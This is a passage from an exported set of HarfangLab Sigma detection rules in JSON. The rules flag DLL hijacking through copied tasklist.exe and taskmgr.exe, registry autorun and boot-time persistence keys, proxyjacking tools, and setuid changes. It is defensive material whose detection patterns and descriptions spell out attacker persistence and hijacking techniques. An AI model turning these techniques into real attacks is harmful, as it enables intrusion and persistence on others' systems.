"attack.t1021.002",
"attack.t1072",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d6c381a9-9a30-44bc-9ef4-59f6c33410b7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600143Z",
"creation_date": "2026-03-23T11:45:34.600147Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600154Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tasklist.yml",
"content": "title: DLL Hijacking via tasklist.exe\nid: d6c381a9-9a30-44bc-9ef4-59f6c33410b7\ndescription: |\n Detects potential Windows DLL Hijacking via tasklist.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tasklist.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\fastprox.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\wmiutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: 
high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d6c381a9-9a30-44bc-9ef4-59f6c33410b7",
"rule_name": "DLL Hijacking via tasklist.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tasklist.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d6fc4ccc-d2d2-4d91-9b2f-320f5783914e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620504Z",
"creation_date": "2026-03-23T11:45:34.620506Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620511Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/rad9800/BootExecuteEDR",
"https://x.com/anylink20240604/status/1922360934418284677",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_uncommon_persistence_registry_asep.yml",
"content": "title: Uncommon Registry Autorun Key Added\nid: d6fc4ccc-d2d2-4d91-9b2f-320f5783914e\ndescription: |\n Detects when an uncommon entry is added/modified in one of the autostart extensibility point (ASEP) in the registry.\n Attackers may achieve persistence by referencing a program with a registry run key.\n It is recommended to investigate the process that added the key as well as the target of the registry key for malicious content.\nreferences:\n - https://github.com/rad9800/BootExecuteEDR\n - https://x.com/anylink20240604/status/1922360934418284677\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2025/05/19\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains:\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunServices\\'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\\'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Run'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Run'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\BootExecute'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\BootExecuteNoPnpSync'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\SetupExecute'\n 
- 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\PlatformExecute'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n # This is handled by the rule 907e5765-e7f7-4b8f-886c-749bf315fe52\n filter_remote:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_bootexecute:\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\BootExecute'\n Details:\n - 'autocheck autochk *'\n - 'autocheck autochk /q /v \\*'\n # autocheck autochk /r /c \\??\\C:\n - 'autocheck autochk /r /c \\\\\\?\\?\\\\?:'\n # autocheck autochk /p \\??\\C:;autocheck autochk *\n - 'autocheck autochk /p \\\\\\?\\?\\\\?:;autocheck autochk \\*'\n # autocheck autochk /r /c \\??\\C:;autocheck autochk *\n - 'autocheck autochk /r /c \\\\\\?\\?\\\\?:;autocheck autochk \\*'\n\n exclusion_policies:\n - TargetObject|contains:\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n ProcessImage:\n - '?:\\Windows\\System32\\omadmclient.exe'\n - '?:\\Windows\\System32\\DeviceEnroller.exe'\n - TargetObject|contains:\n - 
'\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\'\n ProcessParentCommandLine: '?:\\Windows\\system32\\mmc.exe ?:\\Windows\\system32\\gpmc.msc'\n\n exclusion_program_files:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_ninjarmm:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\\\*\\NinjaRMMAgent.exe|'\n\n exclusion_citrix:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details: 'autocheck autochk \\*;PvsVmBoot'\n\n exclusion_fsavailux:\n ProcessImage: '?:\\Windows\\System32\\fsavailux.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_chkdskex:\n ProcessCommandLine: '?:\\Windows\\system32\\DllHost.exe /Processid:{A4C31131-FF70-4984-AFD6-0609CED53AD6}'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_partitionwizard:\n ProcessImage|endswith: '\\PartitionWizard.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'MiniTool Solution Ltd'\n - 'MiniTool Software Limited'\n\n exclusion_partition_editor:\n ProcessDescription: 'NIUBI Partition Editor'\n ProcessCompany: 'NIUBI Technology'\n ProcessSigned: 'true'\n ProcessSignature: 'Chongqing NIUBI Technology Co., Ltd.'\n\n exclusion_icarus:\n ProcessImage|endswith: '\\icarus.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Avast Software s.r.o.'\n - 'AVG Technologies USA, LLC'\n - 'NortonLifeLock Inc.'\n\n exclusion_sysprep:\n ProcessImage: '?:\\Windows\\System32\\Sysprep\\sysprep.exe'\n Details: 'setupcl.exe'\n\n exclusion_poqexec:\n Details:\n - '?:\\Windows\\System32\\poqexec.exe /* \\SystemRoot\\WinSxS\\pending.xml'\n - '?:\\Windows\\System32\\poqexec.exe /* \\SystemRoot\\WinSxS\\reboot.xml'\n\n exclusion_ccmexec:\n - ProcessImage: '?:\\Windows\\CCM\\CcmExec.exe'\n - ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n\n exclusion_setuphost:\n 
ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d6fc4ccc-d2d2-4d91-9b2f-320f5783914e",
"rule_name": "Uncommon Registry Autorun Key Added",
"rule_description": "Detects when an uncommon entry is added/modified in one of the autostart extensibility point (ASEP) in the registry.\nAttackers may achieve persistence by referencing a program with a registry run key.\nIt is recommended to investigate the process that added the key as well as the target of the registry key for malicious content.\n",
"rule_creation_date": "2025-05-19",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d71d45eb-8dcf-40b0-a210-65568b8951db",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613749Z",
"creation_date": "2026-03-23T11:45:34.613753Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613760Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking",
"https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_iproyal_pawns_usage.yml",
"content": "title: IPRoyal Pawn Executed\nid: d71d45eb-8dcf-40b0-a210-65568b8951db\ndescription: |\n Detects the usage of IPRoyal Pawn, a residential proxy service that allows users to sell their internet bandwidth in exchange for money.\n Attackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\n It is recommended to verify if the usage of this tool is legitimate in your infrastructure.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.PUA.Iproyal\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains|all:\n - ' -accept-tos'\n - ' -email=* -password=* -device-name=*'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d71d45eb-8dcf-40b0-a210-65568b8951db",
"rule_name": "IPRoyal Pawn Executed",
"rule_description": "Detects the usage of IPRoyal Pawn, a residential proxy service that allows users to sell their internet bandwidth in exchange for money.\nAttackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\nIt is recommended to verify if the usage of this tool is legitimate in your infrastructure.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-02-05",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d727b5c5-7895-4a53-8cc9-7d2969985af0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618307Z",
"creation_date": "2026-03-23T11:45:34.618309Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618313Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md",
"https://attack.mitre.org/techniques/T1548/001/"
],
"name": "t1548_001_setuid_macos.yml",
"content": "title: SetUID Access Flag Set\nid: d727b5c5-7895-4a53-8cc9-7d2969985af0\ndescription: |\n Detects the SetUID bit being set on a file.\n This could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\n It is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2024/09/17\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.001\n - attack.defense_evasion\n - attack.t1222.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection:\n Kind:\n - chmod\n - chmod2\n PrettyMode: '??S??????'\n ProcessImage|contains: '?'\n\n exclusion_install:\n Image: '/private/tmp/PKInstallSandbox.??????/Scripts/*'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d727b5c5-7895-4a53-8cc9-7d2969985af0",
"rule_name": "SetUID Access Flag Set",
"rule_description": "Detects the SetUID bit being set on a file.\nThis could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\nIt is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\n",
"rule_creation_date": "2024-09-17",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1222.002",
"attack.t1548.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d72d9c8c-0806-4dc7-878b-8b8304d2c8c4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600771Z",
"creation_date": "2026-03-23T11:45:34.600775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600783Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_taskmgr.yml",
"content": "title: DLL Hijacking via taskmgr.exe\nid: d72d9c8c-0806-4dc7-878b-8b8304d2c8c4\ndescription: |\n Detects potential Windows DLL Hijacking via taskmgr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'taskmgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\d3d11.dll'\n - '\\d3d12.dll'\n - '\\duser.dll'\n - '\\dxcore.dll'\n - '\\dxgi.dll'\n - '\\pdh.dll'\n - '\\UxTheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d72d9c8c-0806-4dc7-878b-8b8304d2c8c4",
"rule_name": "DLL Hijacking via taskmgr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via taskmgr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d740ee29-1ab1-4218-97b9-68c90731d0fd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089061Z",
"creation_date": "2026-03-23T11:45:34.089063Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089068Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://oofhours.com/2020/12/03/windows-pe-startup-revisited/",
"https://slightlyovercomplicated.com/2016/11/07/windows-pe-startup-sequence-explained/",
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1547_setup_cmdline_key_set.yml",
"content": "title: Cmdline Registry Key Related to Windows PE Startup Modified\nid: d740ee29-1ab1-4218-97b9-68c90731d0fd\ndescription: |\n Detects a modification of the registry key related to Windows PE startup.\n Adversaries may modify the Cmdline registry key to execute malicious code early in the Windows boot sequence as a persistence mechanism or to gain privileged access.\n It is recommended to check the process making the modification for other suspicious purposes and for suspicious child processes of Winlogon.exe if the machine was rebooted.\nreferences:\n - https://oofhours.com/2020/12/03/windows-pe-startup-revisited/\n - https://slightlyovercomplicated.com/2016/11/07/windows-pe-startup-sequence-explained/\n - https://attack.mitre.org/techniques/T1547/\ndate: 2024/07/23\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\system\\setup\\cmdline'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_osdsetuphook:\n ProcessImage: '?:\\Windows\\System32\\OSDSETUPHOOK.EXE'\n Details: 'system32\\osdsetuphook.exe /execute'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\\\*.exe'\n Details: 'OOBE\\SetupPlatform\\SetupPlatform.exe /rollbackonlinesystem'\n\n exclusion_windeploy:\n # ProcessImage:\n # - '?:\\Windows\\System32\\oobe\\windeploy.exe'\n # - '?:\\Windows\\System32\\Sysprep\\sysprep.exe'\n # - '?:\\Windows\\System32\\CloudExperienceHostBroker.exe'\n Details:\n - 'oobe\\windeploy.exe'\n - '?:\\Windows\\system32\\oobe\\windeploy.exe'\n\n exclusion_smstspostupgrade:\n ProcessGrandparentImage:\n - '?:\\Windows\\System32\\oobe\\windeploy.exe'\n - 
'?:\\Windows\\System32\\winlogon.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\cmd.exe'\n ProcessImage: '?:\\Windows\\System32\\reg.exe'\n Details:\n - '?:\\WINDOWS\\SMSTSPostUpgrade\\setupcomplete.cmd'\n - '?:\\Windows\\SMSTSPostUpgrade\\setuprollback.cmd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d740ee29-1ab1-4218-97b9-68c90731d0fd",
"rule_name": "Cmdline Registry Key Related to Windows PE Startup Modified",
"rule_description": "Detects a modification of the registry key related to Windows PE startup.\nAdversaries may modify the Cmdline registry key to execute malicious code early in the Windows boot sequence as a persistence mechanism or to gain privileged access.\nIt is recommended to check the process making the modification for other suspicious purposes and for suspicious child processes of Winlogon.exe if the machine was rebooted.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d7778b81-d88b-4182-8bf9-14ade4b1124c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622649Z",
"creation_date": "2026-03-23T11:45:34.622651Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622656Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_defender_disable_registry.yml",
